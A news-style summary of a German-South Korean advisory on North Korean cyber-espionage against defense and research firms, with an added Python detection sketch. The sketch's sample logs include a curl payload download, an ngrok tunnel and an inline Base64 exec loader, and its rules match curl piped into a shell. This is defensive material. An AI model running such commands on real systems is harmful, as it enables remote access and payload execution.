BfV and NIS Issue Joint Advisory on North Korean Cyber Threats to Defense and Research Sectors
A joint cybersecurity advisory released by Germany's Bundesamt für Verfassungsschutz (BfV) and South Korea's National Intelligence Service (NIS) warns of cyber-espionage campaigns orchestrated by North Korean actors targeting the defense and research sectors. These campaigns, attributed to groups including the notorious Lazarus, aim to exfiltrate advanced military technologies to bolster North Korea's military capabilities. The advisory outlines two specific campaigns: one involving a sophisticated supply-chain attack against a maritime and shipping technologies research center, and another leveraging social engineering tactics under "Operation Dream Job" to infiltrate defense companies.
The first campaign involved a strategic compromise of a third-party vendor, which gave the threat actors unauthorized entry into the target's network via compromised SSH credentials and enabled lateral movement. Once inside, they implanted malware and used tools such as curl to download additional malicious payloads from command-and-control (C2) servers, including a tunneling tool (Ngrok) for remote access and a Base64-encoded Python script functioning as a downloader. The attack culminated in the deployment of "remote-control malware through a patch management system (PMS) of the research center," as highlighted in the advisory, which allowed the attackers to steal valuable account information and email content.
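The tooling named in the advisory (curl fetching payloads from C2, Ngrok for tunneling, and a Base64-encoded Python downloader) leaves recognizable traces in process-execution telemetry. The following is an added detection example, not code from the advisory or from either agency; the log format (`timestamp host user cmdline`), the sample log lines (which use a documentation IP range and a harmless decoded payload), and the regex rules are all constructed assumptions for this illustration.

```python
"""
Detection sketch for the TTPs described in the BfV/NIS advisory, run over
constructed process-execution log lines. Each matching line is returned as
a finding; for the inline-Base64 rule the literal is decoded so an analyst
can see what the loader would have executed.
"""
import base64
import re
from typing import Dict, List

# Constructed sample telemetry (assumed format: "<timestamp> <host> <user> <command line>").
# 203.0.113.10 is a documentation-only address; the Base64 blob decodes to a benign print().
SAMPLE_LOG = """\
2024-02-19T08:12:03Z research-ws01 svc_build curl -s http://203.0.113.10/update.bin -o /tmp/update.bin
2024-02-19T08:12:09Z research-ws01 svc_build /tmp/ngrok tcp 22
2024-02-19T08:12:15Z research-ws01 svc_build python3 -c "import base64;exec(base64.b64decode('cHJpbnQoJ2hlbGxvJyk='))"
2024-02-19T08:13:00Z research-ws01 jdoe ssh build-srv01
2024-02-19T08:14:22Z research-ws01 jdoe python3 manage.py test
"""

# Rule patterns are assumptions for this example; tune them to your environment.
RULES = {
    # curl writing a remote resource to disk or piping it into an interpreter
    "curl_download": re.compile(
        r"\bcurl\b.*\s(-o|-O|--output)\b|\bcurl\b.*\|\s*(sh|bash|python3?)\b", re.I
    ),
    # ngrok started as a tunnel (the advisory names Ngrok for remote access)
    "tunneling_tool": re.compile(r"\bngrok\b\s+(tcp|http|start)\b", re.I),
    # python invoked with an inline command that decodes Base64 at runtime
    "b64_python_loader": re.compile(r"\bpython3?\b.*-c\b.*b64decode", re.I),
}

# First Base64 literal handed to b64decode(...) on the command line
B64_LITERAL = re.compile(r"""b64decode\(\s*['"]([A-Za-z0-9+/=]+)['"]""")


def decode_inline_b64(cmdline: str) -> str:
    """Best-effort decode of an inline Base64 literal for analyst triage ('' if none/invalid)."""
    m = B64_LITERAL.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-8", errors="replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return ""


def detect(log_text: str) -> List[Dict[str, str]]:
    """Return one finding per (line, rule) match, in log order."""
    findings: List[Dict[str, str]] = []
    for raw in log_text.splitlines():
        parts = raw.split(maxsplit=3)
        if len(parts) < 4:
            continue  # malformed or empty line; nothing to evaluate
        ts, host, user, cmdline = parts
        for name, pattern in RULES.items():
            if pattern.search(cmdline):
                finding = {"rule": name, "ts": ts, "host": host, "user": user, "cmdline": cmdline}
                if name == "b64_python_loader":
                    finding["decoded"] = decode_inline_b64(cmdline)
                findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_LOG):
        print(f"[{f['rule']}] {f['ts']} {f['host']} {f['user']}: {f['cmdline']}")
        if f.get("decoded"):
            print("    decoded payload:", f["decoded"])
```

In practice these rules would sit in an EDR or SIEM query rather than a script; the value here is the pairing of a command-line match with an automatic decode of the inline Base64, which turns a noisy "python -c" alert into something an analyst can assess immediately. The benign `ssh` and `manage.py` lines are included to show that ordinary developer activity on the same host does not trigger the rules.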
The second campaign, "Operation Dream Job," involved the continued exploitation of social engineering to deceive employees in the defense sector through fabricated job offers, leading to the deployment of initial-stage malware. Attributed to the North Korean threat group Lazarus, this operation has been active since 2020, employing non-technical strategies to circumvent traditional security measures. The attackers meticulously crafted headhunter profiles on job portals to entice potential candidates with alluring job propositions. By exploiting the inherent trust between employers and prospective employees, the attackers increased the likelihood of their targets downloading malicious payloads.
To bolster security defenses, the BfV and NIS recommend that organizations enforce the principle of least privilege, establish robust password policies, and adopt multi-factor authentication. Additionally, they emphasize the importance of user awareness regarding the tactics employed by threat actors, especially concerning phishing attacks.